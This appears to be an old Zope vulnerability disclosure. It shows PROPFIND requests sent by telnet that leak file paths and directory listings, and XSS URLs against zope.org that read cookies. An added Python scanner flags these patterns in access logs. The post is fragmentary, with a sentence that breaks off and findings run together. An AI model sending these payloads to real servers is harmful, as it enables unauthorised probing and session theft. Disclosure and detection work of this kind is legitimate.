Found vulnerability: retrieve a full path to local files in Zope.
---[ Example 1 (Linux):
telnet www.zope.org 80
PROPFIND / HTTP/1.0
F
G
H
J
K
L
HTTP/1.0 500 Internal Server Error
Server: Zope/Zope 2.3.2 (source release, python 1.5.2, linux2) ZServer/1.1b1
Date: Mon, 10 Sep 2001 15:38:59 GMT
Example:
http://www.zope.org/Documentation/<SCRIPT>alert(document.domain)</SCRIPT>
http://www.zope.org/lalalalal<SCRIPT>alert(document.domain)</SCRIPT>
http://www.zope.org/<SCRIPT>alert(document.cookie)</SCRIPT>
For example, an attacker might post a message like
Hello message board. This is a
Vulnerability: an attacker can get a list of files and directories
Tested on Win32 platform
Example:
telnet zopeserver 8080
PROPFIND / HTTP/1.0
enter
enter
enter
list of files and directories
This was tested on my site:
security.instock.ru 8080
___
Zope-Dev
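
Added example, not part of the original post and not Zope code: a small access-log check for the request patterns reported above (PROPFIND answered with a 500 error page, PROPFIND answered with a listing, and markup characters in the URL path). It assumes the server writes a common/combined-format access log; the finding labels and the sample lines are constructed for illustration.

```python
import re
from urllib.parse import unquote

# Common/combined log format: client, two ids, [time], "METHOD path proto", status
# (assumed access-log layout; adjust the pattern to the server's real format).
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" (?P<status>\d{3}) '
)
# Characters that should never reach an error page unescaped.
MARKUP_RE = re.compile(r'[<>"\']')

# Constructed sample lines, not taken from a real server.
SAMPLE_LOG = """\
192.0.2.10 - - [10/Sep/2001:15:38:59 +0000] "PROPFIND / HTTP/1.0" 500 1843
192.0.2.11 - - [10/Sep/2001:15:40:02 +0000] "GET /Documentation/%3CSCRIPT%3Ealert(document.domain)%3C/SCRIPT%3E HTTP/1.0" 404 912
192.0.2.12 - - [10/Sep/2001:15:41:10 +0000] "GET /Documentation HTTP/1.0" 200 5120
192.0.2.10 - - [10/Sep/2001:15:42:00 +0000] "PROPFIND / HTTP/1.0" 207 2290
this line is malformed
"""

def classify(line):
    """Return (client, [findings]) for a suspicious line, else None."""
    m = LINE_RE.match(line)
    if not m:
        return None  # unparseable lines are skipped, not guessed at
    findings = []
    status = int(m["status"])
    if m["method"] == "PROPFIND":
        if status >= 500:
            findings.append("propfind-error")    # error page may leak paths
        elif status == 207:
            findings.append("propfind-listing")  # Multi-Status listing served
    # Decode percent-escapes first so encoded markup is caught as well.
    if MARKUP_RE.search(unquote(m["path"])):
        findings.append("markup-in-path")
    return (m["ip"], findings) if findings else None

def scan(text):
    """Classify every line of a log and keep only the flagged ones."""
    return [hit for hit in map(classify, text.splitlines()) if hit]

if __name__ == "__main__":
    for client, findings in scan(SAMPLE_LOG):
        print(client, ",".join(findings))
```

Each flagged client is worth checking against the server's response body: a 500 page that prints a traceback with file paths, or a 207 answer to an unauthenticated PROPFIND, confirms the exposure described in the post.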